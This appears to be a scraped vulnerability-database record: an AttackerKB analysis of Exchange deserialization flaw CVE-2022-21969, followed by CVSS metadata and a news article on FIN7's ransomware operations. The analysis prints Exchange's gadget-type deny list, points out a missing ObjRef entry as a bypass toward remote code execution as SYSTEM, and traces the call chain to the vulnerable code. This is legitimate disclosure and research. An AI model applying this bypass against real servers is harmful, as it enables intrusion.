\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new BlockedDeserializeTypeException(fullName, BlockedDeserializeTypeException.BlockReason.NotInAllow, location); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (BlockedDeserializeTypeException ex) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0DeserializationTypeLogger.Singleton.Log(ex.TypeName, ex.Reason, location, (flag || strictMode) ? DeserializationTypeLogger.BlockStatus.TrulyBlocked : DeserializationTypeLogger.BlockStatus.WouldBeBlocked); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (flag) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0private static HashSet<string> BuildDisallowedGenerics() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return new HashSet<string> { typeof(SortedSet<>).GetGenericTypeDefinition().FullName }; \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0private static HashSet<string> BuildDisallowedTypesForDeserialization() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return new HashSet<string> \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"Microsoft.Data.Schema.SchemaModel.ModelStore\", \"Microsoft.FailoverClusters.NotificationViewer.ConfigStore\", \"Microsoft.IdentityModel.Claims.WindowsClaimsIdentity\", \"Microsoft.Management.UI.Internal.FilterRuleExtensions\", \"Microsoft.Management.UI.FilterRuleExtensions\", \"Microsoft.Reporting.RdlCompile.ReadStateFile\", \"Microsoft.TeamFoundation.VersionControl.Client.PolicyEnvelope\", \"Microsoft.VisualStudio.DebuggerVisualizers.VisualizerObjectSource\", \"Microsoft.VisualStudio.Editors.PropPageDesigner.PropertyPageSerializationService+PropertyPageSerializationStore\", \"Microsoft.VisualStudio.EnterpriseTools.Shell.ModelingPackage\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"Microsoft.VisualStudio.Modeling.Diagnostics.XmlSerialization\", \"Microsoft.VisualStudio.Publish.BaseProvider.Util\", \"Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties\", \"Microsoft.VisualStudio.Web.WebForms.ControlDesignerStateCache\", \"Microsoft.Web.Design.Remote.ProxyObject\", \"System.Activities.Presentation.WorkflowDesigner\", \"System.AddIn.Hosting.AddInStore\", \"System.AddIn.Hosting.Utils\", \"System.CodeDom.Compiler.TempFileCollection\", \"System.Collections.Hashtable\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.ComponentModel.Design.DesigntimeLicenseContextSerializer\", \"System.Configuration.Install.AssemblyInstaller\", \"System.Configuration.SettingsPropertyValue\", \"System.Data.DataSet\", \"System.Data.DataViewManager\", \"System.Data.Design.MethodSignatureGenerator\", \"System.Data.Design.TypedDataSetGenerator\", \"System.Data.Design.TypedDataSetSchemaImporterExtension\", \"System.Data.SerializationFormat\", \"System.DelegateSerializationHolder\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Drawing.Design.ToolboxItemContainer\", \"System.Drawing.Design.ToolboxItemContainer+ToolboxItemSerializer\", \"System.IdentityModel.Services.Tokens.MachineKeySessionSecurityTokenHandler\", \"System.IdentityModel.Tokens.SessionSecurityToken\", \"System.IdentityModel.Tokens.SessionSecurityTokenHandler\", \"System.IO.FileSystemInfo\", \"System.Management.Automation.PSObject\", \"System.Management.IWbemClassObjectFreeThreaded\", \"System.Messaging.BinaryMessageFormatter\", \"System.Resources.ResourceReader\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Resources.ResXResourceSet\", \"System.Runtime.Remoting.Channels.BinaryClientFormatterSink\", \"System.Runtime.Remoting.Channels.BinaryClientFormatterSinkProvider\", \"System.Runtime.Remoting.Channels.BinaryServerFormatterSink\", \"System.Runtime.Remoting.Channels.BinaryServerFormatterSinkProvider\", \"System.Runtime.Remoting.Channels.CrossAppDomainSerializer\", \"System.Runtime.Remoting.Channels.SoapClientFormatterSink\", \"System.Runtime.Remoting.Channels.SoapClientFormatterSinkProvider\", \"System.Runtime.Remoting.Channels.SoapServerFormatterSink\", \"System.Runtime.Remoting.Channels.SoapServerFormatterSinkProvider\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\", \"System.Runtime.Serialization.Formatters.Soap.SoapFormatter\", \"System.Runtime.Serialization.NetDataContractSerializer\", \"System.Security.Claims.ClaimsIdentity\", \"System.Security.Claims.ClaimsPrincipal\", \"System.Security.Principal.WindowsIdentity\", \"System.Security.Principal.WindowsPrincipal\", \"System.Security.SecurityException\", \"System.Web.Security.RolePrincipal\", \"System.Web.Script.Serialization.JavaScriptSerializer\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Web.Script.Serialization.SimpleTypeResolver\", \"System.Web.UI.LosFormatter\", \"System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem\", \"System.Web.UI.ObjectStateFormatter\", \"System.Windows.Data.ObjectDataProvider\", \"System.Windows.Forms.AxHost+State\", \"System.Windows.ResourceDictionary\", \"System.Workflow.ComponentModel.Activity\", \"System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector\", \"System.Xml.XmlDataDocument\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Xml.XmlDocument\" \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}; \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0private static HashSet<string> BuildGlobalDisallowedGenericsForDeserialization() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return new HashSet<string>(); \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\n**Interesting to note that this doesn\u2019t seem to contain the entries for `System.Runtime.Remoting.ObjectRef`** which was a new gadget chain just added with <https://github.com/pwntester/ysoserial.net/pull/115> that relies on a rouge .NET remoting server like <https://github.com/codewhitesec/RogueRemotingServer>. There is a writeup on this at <https://codewhitesec.blogspot.com/2022/01/dotnet-remoting-revisited.html> that explains more but this would allow RCE via a serialized payload attached to the rouge .NET remoting server.\n\nAnyway so from earlier we know that the strict mode is determined via the line `bool strictModeStatus = Microsoft.Exchange.Data.Serialization.Serialization.GetStrictModeStatus(DeserializeLocation.ExchangeCertificateRpc);` so this provides our other bypass.\n\nLets check if the result of this is `False` or not:\n\nSo from here we can likely supply a `System.Runtime.Remoting.ObjectRef`, take advantage of the lack of strict checking on this, and get the whole exploit to work. The problem now is finding the whole chain to reach this vulnerable call and then trigger the deserialization.\n\n# January 2022 Patch Analysis\n\n * No adjustments to the `ChainedSerializationBinder` deny list at all. \n\n\nHere is the Jan 2022 version of the deny list:\n \n \n \u00a0\u00a0\u00a0\u00a0private static HashSet<string> BuildDisallowedTypesForDeserialization() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return new HashSet<string> \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"Microsoft.Data.Schema.SchemaModel.ModelStore\", \"Microsoft.FailoverClusters.NotificationViewer.ConfigStore\", \"Microsoft.IdentityModel.Claims.WindowsClaimsIdentity\", \"Microsoft.Management.UI.Internal.FilterRuleExtensions\", \"Microsoft.Management.UI.FilterRuleExtensions\", \"Microsoft.Reporting.RdlCompile.ReadStateFile\", \"Microsoft.TeamFoundation.VersionControl.Client.PolicyEnvelope\", \"Microsoft.VisualStudio.DebuggerVisualizers.VisualizerObjectSource\", \"Microsoft.VisualStudio.Editors.PropPageDesigner.PropertyPageSerializationService+PropertyPageSerializationStore\", \"Microsoft.VisualStudio.EnterpriseTools.Shell.ModelingPackage\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"Microsoft.VisualStudio.Modeling.Diagnostics.XmlSerialization\", \"Microsoft.VisualStudio.Publish.BaseProvider.Util\", \"Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties\", \"Microsoft.VisualStudio.Web.WebForms.ControlDesignerStateCache\", \"Microsoft.Web.Design.Remote.ProxyObject\", \"System.Activities.Presentation.WorkflowDesigner\", \"System.AddIn.Hosting.AddInStore\", \"System.AddIn.Hosting.Utils\", \"System.CodeDom.Compiler.TempFileCollection\", \"System.Collections.Hashtable\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.ComponentModel.Design.DesigntimeLicenseContextSerializer\", \"System.Configuration.Install.AssemblyInstaller\", \"System.Configuration.SettingsPropertyValue\", \"System.Data.DataSet\", \"System.Data.DataViewManager\", \"System.Data.Design.MethodSignatureGenerator\", \"System.Data.Design.TypedDataSetGenerator\", \"System.Data.Design.TypedDataSetSchemaImporterExtension\", \"System.Data.SerializationFormat\", \"System.DelegateSerializationHolder\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Drawing.Design.ToolboxItemContainer\", \"System.Drawing.Design.ToolboxItemContainer+ToolboxItemSerializer\", \"System.IdentityModel.Services.Tokens.MachineKeySessionSecurityTokenHandler\", \"System.IdentityModel.Tokens.SessionSecurityToken\", \"System.IdentityModel.Tokens.SessionSecurityTokenHandler\", \"System.IO.FileSystemInfo\", \"System.Management.Automation.PSObject\", \"System.Management.IWbemClassObjectFreeThreaded\", \"System.Messaging.BinaryMessageFormatter\", \"System.Resources.ResourceReader\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Resources.ResXResourceSet\", \"System.Runtime.Remoting.Channels.BinaryClientFormatterSink\", \"System.Runtime.Remoting.Channels.BinaryClientFormatterSinkProvider\", \"System.Runtime.Remoting.Channels.BinaryServerFormatterSink\", \"System.Runtime.Remoting.Channels.BinaryServerFormatterSinkProvider\", \"System.Runtime.Remoting.Channels.CrossAppDomainSerializer\", \"System.Runtime.Remoting.Channels.SoapClientFormatterSink\", \"System.Runtime.Remoting.Channels.SoapClientFormatterSinkProvider\", \"System.Runtime.Remoting.Channels.SoapServerFormatterSink\", \"System.Runtime.Remoting.Channels.SoapServerFormatterSinkProvider\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\", \"System.Runtime.Serialization.Formatters.Soap.SoapFormatter\", \"System.Runtime.Serialization.NetDataContractSerializer\", \"System.Security.Claims.ClaimsIdentity\", \"System.Security.Claims.ClaimsPrincipal\", \"System.Security.Principal.WindowsIdentity\", \"System.Security.Principal.WindowsPrincipal\", \"System.Security.SecurityException\", \"System.Web.Security.RolePrincipal\", \"System.Web.Script.Serialization.JavaScriptSerializer\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Web.Script.Serialization.SimpleTypeResolver\", \"System.Web.UI.LosFormatter\", \"System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem\", \"System.Web.UI.ObjectStateFormatter\", \"System.Windows.Data.ObjectDataProvider\", \"System.Windows.Forms.AxHost+State\", \"System.Windows.ResourceDictionary\", \"System.Workflow.ComponentModel.Activity\", \"System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector\", \"System.Xml.XmlDataDocument\", \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"System.Xml.XmlDocument\" \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}; \n \u00a0\u00a0\u00a0\u00a0}\n \n\nLooking at this in [[Meld]] shows that the deny list for `ChainedSerializationBinder` did not change between November 2021 and January 2022. So we could use `System.Runtime.Remoting.ObjRef` to bypass this deny list, potentially also allowing RCE on the latest version.\n\n * Removed `Microsoft.Exchange.DxStore.Common.DxBinarySerializationUtil` which seemed to have some options for doing unsafe deserialization. \n\n \n \n using System;\n using System.IO;\n using FUSE.Weld.Base;\n using Microsoft.Exchange.Diagnostics;\n using Microsoft.Exchange.DxStore.Server;\n \n namespace Microsoft.Exchange.DxStore.Common;\n \n public static class DxBinarySerializationUtil\n {\n \tprivate static readonly string[] allowedTypes = new string[101]\n \t{\n \t\ttypeof(ExceptionUri).FullName,\n \t\ttypeof(Ranges).FullName,\n \t\ttypeof(Range).FullName,\n \t\ttypeof(Target).FullName,\n \t\ttypeof(CommonSettings).FullName,\n \t\ttypeof(DataStoreStats).FullName,\n \t\ttypeof(DxStoreAccessClientException).FullName,\n \t\ttypeof(DxStoreAccessClientTransientException).FullName,\n \t\ttypeof(DxStoreAccessReply).FullName,\n \t\ttypeof(DxStoreAccessReply.CheckKey).FullName,\n \t\ttypeof(DxStoreAccessReply.DeleteKey).FullName,\n \t\ttypeof(DxStoreAccessReply.DeleteProperty).FullName,\n \t\ttypeof(DxStoreAccessReply.ExecuteBatch).FullName,\n \t\ttypeof(DxStoreAccessReply.GetAllProperties).FullName,\n \t\ttypeof(DxStoreAccessReply.GetProperty).FullName,\n \t\ttypeof(DxStoreAccessReply.GetPropertyNames).FullName,\n \t\ttypeof(DxStoreAccessReply.GetSubkeyNames).FullName,\n \t\ttypeof(DxStoreAccessReply.SetProperty).FullName,\n \t\ttypeof(DxStoreAccessRequest).FullName,\n \t\ttypeof(DxStoreAccessRequest.CheckKey).FullName,\n \t\ttypeof(DxStoreAccessRequest.DeleteKey).FullName,\n \t\ttypeof(DxStoreAccessRequest.DeleteProperty).FullName,\n \t\ttypeof(DxStoreAccessRequest.ExecuteBatch).FullName,\n \t\ttypeof(DxStoreAccessRequest.GetAllProperties).FullName,\n \t\ttypeof(DxStoreAccessRequest.GetProperty).FullName,\n \t\ttypeof(DxStoreAccessRequest.GetPropertyNames).FullName,\n \t\ttypeof(DxStoreAccessRequest.GetSubkeyNames).FullName,\n \t\ttypeof(DxStoreAccessRequest.SetProperty).FullName,\n \t\ttypeof(DxStoreAccessServerTransientException).FullName,\n \t\ttypeof(DxStoreBatchCommand).FullName,\n \t\ttypeof(DxStoreBatchCommand.CreateKey).FullName,\n \t\ttypeof(DxStoreBatchCommand.DeleteKey).FullName,\n \t\ttypeof(DxStoreBatchCommand.DeleteProperty).FullName,\n \t\ttypeof(DxStoreBatchCommand.SetProperty).FullName,\n \t\ttypeof(DxStoreBindingNotSupportedException).FullName,\n \t\ttypeof(DxStoreClientException).FullName,\n \t\ttypeof(DxStoreClientTransientException).FullName,\n \t\ttypeof(DxStoreCommand).FullName,\n \t\ttypeof(DxStoreCommand.ApplySnapshot).FullName,\n \t\ttypeof(DxStoreCommand.CreateKey).FullName,\n \t\ttypeof(DxStoreCommand.DeleteKey).FullName,\n \t\ttypeof(DxStoreCommand.DeleteProperty).FullName,\n \t\ttypeof(DxStoreCommand.DummyCommand).FullName,\n \t\ttypeof(DxStoreCommand.ExecuteBatch).FullName,\n \t\ttypeof(DxStoreCommand.PromoteToLeader).FullName,\n \t\ttypeof(DxStoreCommand.SetProperty).FullName,\n \t\ttypeof(DxStoreCommand.UpdateMembership).FullName,\n \t\ttypeof(DxStoreCommand.VerifyStoreIntegrity).FullName,\n \t\ttypeof(DxStoreCommand.VerifyStoreIntegrity2).FullName,\n \t\ttypeof(DxStoreCommandConstraintFailedException).FullName,\n \t\ttypeof(DxStoreInstanceClientException).FullName,\n \t\ttypeof(DxStoreInstanceClientTransientException).FullName,\n \t\ttypeof(DxStoreInstanceComponentNotInitializedException).FullName,\n \t\ttypeof(DxStoreInstanceKeyNotFoundException).FullName,\n \t\ttypeof(DxStoreInstanceNotReadyException).FullName,\n \t\ttypeof(DxStoreInstanceServerException).FullName,\n \t\ttypeof(DxStoreInstanceServerTransientException).FullName,\n \t\ttypeof(DxStoreInstanceStaleStoreException).FullName,\n \t\ttypeof(DxStoreManagerClientException).FullName,\n \t\ttypeof(DxStoreManagerClientTransientException).FullName,\n \t\ttypeof(DxStoreManagerGroupNotFoundException).FullName,\n \t\ttypeof(DxStoreManagerServerException).FullName,\n \t\ttypeof(DxStoreManagerServerTransientException).FullName,\n \t\ttypeof(DxStoreReplyBase).FullName,\n \t\ttypeof(DxStoreRequestBase).FullName,\n \t\ttypeof(DxStoreSerializeException).FullName,\n \t\ttypeof(DxStoreServerException).FullName,\n \t\ttypeof(DxStoreServerFault).FullName,\n \t\ttypeof(DxStoreServerTransientException).FullName,\n \t\ttypeof(HttpReply).FullName,\n \t\ttypeof(HttpReply.DxStoreReply).FullName,\n \t\ttypeof(HttpReply.ExceptionReply).FullName,\n \t\ttypeof(HttpReply.GetInstanceStatusReply).FullName,\n \t\ttypeof(HttpRequest).FullName,\n \t\ttypeof(HttpRequest.DxStoreRequest).FullName,\n \t\ttypeof(HttpRequest.GetStatusRequest).FullName,\n \t\ttypeof(HttpRequest.GetStatusRequest.Reply).FullName,\n \t\ttypeof(HttpRequest.PaxosMessage).FullName,\n \t\ttypeof(InstanceGroupConfig).FullName,\n \t\ttypeof(InstanceGroupMemberConfig).FullName,\n \t\ttypeof(InstanceGroupSettings).FullName,\n \t\ttypeof(InstanceManagerConfig).FullName,\n \t\ttypeof(InstanceSnapshotInfo).FullName,\n \t\ttypeof(InstanceStatusInfo).FullName,\n \t\ttypeof(LocDescriptionAttribute).FullName,\n \t\ttypeof(PaxosBasicInfo).FullName,\n \t\ttypeof(PaxosBasicInfo.GossipDictionary).FullName,\n \t\ttypeof(ProcessBasicInfo).FullName,\n \t\ttypeof(PropertyNameInfo).FullName,\n \t\ttypeof(PropertyValue).FullName,\n \t\ttypeof(ReadOptions).FullName,\n \t\ttypeof(ReadResult).FullName,\n \t\ttypeof(WcfTimeout).FullName,\n \t\ttypeof(WriteOptions).FullName,\n \t\ttypeof(WriteResult).FullName,\n \t\ttypeof(WriteResult.ResponseInfo).FullName,\n \t\ttypeof(GroupStatusInfo).FullName,\n \t\ttypeof(GroupStatusInfo.NodeInstancePair).FullName,\n \t\ttypeof(InstanceMigrationInfo).FullName,\n \t\ttypeof(KeyContainer).FullName,\n \t\ttypeof(DateTimeOffset).FullName\n \t};\n \n \tprivate static readonly string[] allowedGenerics = new string[6] { \"System.Collections.Generic.ObjectEqualityComparer`1\", \"System.Collections.Generic.EnumEqualityComparer`1\", \"System.Collections.Generic.EqualityComparer`1\", \"System.Collections.Generic.GenericEqualityComparer`1\", \"System.Collections.Generic.KeyValuePair`2\", \"System.Collections.Generic.List`1\" };\n \n \tpublic static void Serialize(MemoryStream ms, object obj)\n \t{\n \t\tExchangeBinaryFormatterFactory.CreateSerializeOnlyFormatter().Serialize(ms, obj);\n \t}\n \n \tpublic static object DeserializeUnsafe(Stream s)\n \t{\n \t\treturn ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation.HttpBinarySerialize).Deserialize(s);\n \t}\n \n \tpublic static object Deserialize(Stream s)\n \t{\n \t\treturn DeserializeSafe(s);\n \t}\n \n \tpublic static object DeserializeSafe(Stream s)\n \t{\n \t\treturn ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation.SwordFish_AirSync, strictMode: false, allowedTypes, allowedGenerics).Deserialize(s);\n \t}\n }\n \n\n * Added in `Microsoft.Exchange.DxStore.Common.IDxStoreDynamicConfig.cs` which has the following code: \n\n \n \n namespace Microsoft.Exchange.DxStore.Common;\n \n public interface IDxStoreDynamicConfig\n {\n \tbool IsRemovePublicKeyToken { get; }\n \n \tbool IsSerializerIncompatibleInitRemoved { get; }\n \n \tbool EnableResolverTypeCheck { get; }\n \n \tbool EnableResolverTypeCheckException { get; }\n }\n \n\n# Exploit Chain\n\nLets start at the deserialization chain and work backwards.\n \n \n Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc.DeserializeObject\n Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc.ExchangeCertificateRpc(ExchangeCertificateRpcVersion version, byte[] inputBlob, byte[] outputBlob)\n Microsoft.Exchange.Servicelets.ExchangeCertificate.ExchangeCertificateServerHelper.GetCertificate(int version, byte[] inputBlob)\n Microsoft.Exchange.Servicelets.ExchangeCertificate.ExchangeCertificateServer.GetCertificate(int version, byte[] inputBlob)\n \n\nWe can then use the `Get-ExchangeCertificate` commandlet from <https://docs.microsoft.com/en-us/powershell/module/exchange/get-exchangecertificate?view=exchange-ps> and set a breakpoint inside `Microsoft.Exchange.ExchangeCertificateServicelet.dll` specifically within the `Microsoft.Exchange.Servicelets.ExchangeCertificate.GetCertificate` handler.\n\nUnfortunately it seems like the current way things work we are sending a `ExchangeCertificateRpcVersion rpcVersion` with a version of `Version2`.\n\nExploited process is `Microsoft.Exchange.ServiceHost.exe` which runs as `NT AUTHORITY\\SYSTEM`.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21969", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321", "CVE-2022-21846", "CVE-2022-21855", "CVE-2022-21969"], "modified": "2022-02-08T00:00:00", "id": "AKB:0A7DD7B4-3522-4B79-B4A6-3B2A86B2EADE", "href": "https://attackerkb.com/topics/QdE4FMzghj/cve-2022-21969", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-12-26T12:10:08", "description": "[![Ransomware Hackers](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgu9YKd02vdFX9q7nH_mj_COAplqIClED8G3-bIqGZfD9uEAVx2YkW4pnR4oTHEKnrj9qtpM11W6mYLnGXvGxEt9IFdVd2PCh0jnop8BOe_IT_acIv-VKs3Q-JjeXkZPvJplINEolBZljwID-Ev26al_uOtbkyFHFd7atp9dyswl66CcZIVuWykjyr6wg/s728-rj-e365/cyber.png>)\n\nAn exhaustive analysis of **FIN7** has unmasked the cybercrime syndicate's organizational hierarchy, alongside unraveling its role as an affiliate for mounting ransomware attacks.\n\nIt has also exposed deeper associations between the group and the larger threat ecosystem comprising the now-defunct ransomware [DarkSide](<https://thehackernews.com/2022/05/us-proposes-1-million-fine-on-colonial.html>), [REvil](<https://thehackernews.com/2022/05/new-revil-samples-indicate-ransomware.html>), and [LockBit](<https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html>) families.\n\nThe highly active threat group, also known as Carbanak, is [known](<https://thehackernews.com/2022/04/fin7-hackers-leveraging-password-reuse.html>) for employing an extensive arsenal of tools and tactics to expand its \"cybercrime horizons,\" including adding ransomware to its playbook and setting up fake security companies to lure researchers into conducting ransomware attacks under the guise of penetration testing.\n\nMore than 8,147 victims have been compromised by the financially motivated adversary across the world, with a majority of the entities located in the U.S. Other prominent countries include China, Germany, Canada, Italy, and the U.K.\n\nFIN7's intrusion techniques, over the years, have further diversified beyond traditional social engineering to include infected USB drives, software supply chain compromise, and the use of stolen credentials purchased from underground markets.\n\n\"Nowadays, its initial approach is to carefully pick high-value companies from the pool of already compromised enterprise systems and force them to pay large ransoms to restore their data or seek unique ways to monetize the data and remote access,\" PRODAFT [said](<https://www.prodaft.com/resource/detail/fin7-unveiled-deep-dive-notorious-cybercrime-gang>) in a report shared with The Hacker News.\n\nAccording to the Swiss cybersecurity company, the Russian-speaking hacking crew has also been observed to weaponize several flaws in Microsoft Exchange such as [CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>), [CVE-2021-42321](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>), [ProxyLogon, and ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) to obtain a foothold into target environments.\n\n[![FIN7 Cybercrime Syndicate](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhXWJSj-lP5zgkimydTc-CwuBckZJpMoZ8KlEOqjTK1s14n8Ry6x7NcJHE6iuaC2p2llH7aphAnF9AGSkY-IMY3ofTAKq1rATS5XB5z-Fnxh6v2Lr3_wmyfCwBsAALRjmoyzwRDHWnMfGyS3UC_ftVWp1CnJeC09vF4HmeUbM2J0Y7BwIeouLTThKTe/s728-rj-e365/fin7.png>)\n\nThe use of [double extortion tactics](<https://thehackernews.com/2022/12/cuba-ransomware-extorted-over-60.html>) notwithstanding, attacks mounted by the group have deployed SSH backdoors on the compromised systems, even in scenarios where the victim has already paid a ransom.\n\nThe idea is to resell access to other ransomware outfits and re-target the victims as part of its illicit money-making scheme, underscoring its attempts to minimize efforts and maximize profits, not to mention prioritize companies based on their annual revenues, founded dates, and the number of employees.\n\nThis \"demonstrates a particular type of feasibility study considered a unique behavior among cybercrime groups,\" the researchers said.\n\n[![FIN7 Cybercrime Syndicate](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1L6lSPfanTW7NwX9INlkaghoZj0MyjyyCHu7VJ2WOAB0-a8ipVazPaPiLkSPVkIBBeBrgcnwVzrKGh7hIH0N52sNHSgp7Vbg9K4Rqm_6NIALFtTqkkLtv6AkE8lDtTL7ZEb5WVXABPi3XMY0clFfTSBtJq_7t66O_imTe8dVlT7-vL0MHcB3e1LBL/s728-rj-e365/data.png>)\n\nPut differently, the modus operandi of FIN7 boils down to this: It utilizes services like Crunchbase, Dun & Bradstreet (DNB), Owler, and Zoominfo to shortlist firms and organizations with the highest revenue. It also uses other website analytics platforms like MuStat and Similarweb to monitor traffic to the victims' sites.\n\nInitial access is then obtained through one of the many intrusion vectors, followed by exfiltrating data, encrypting files, and eventually determining the ransom amount based on the company's revenue.\n\n[![FIN7 Cybercrime 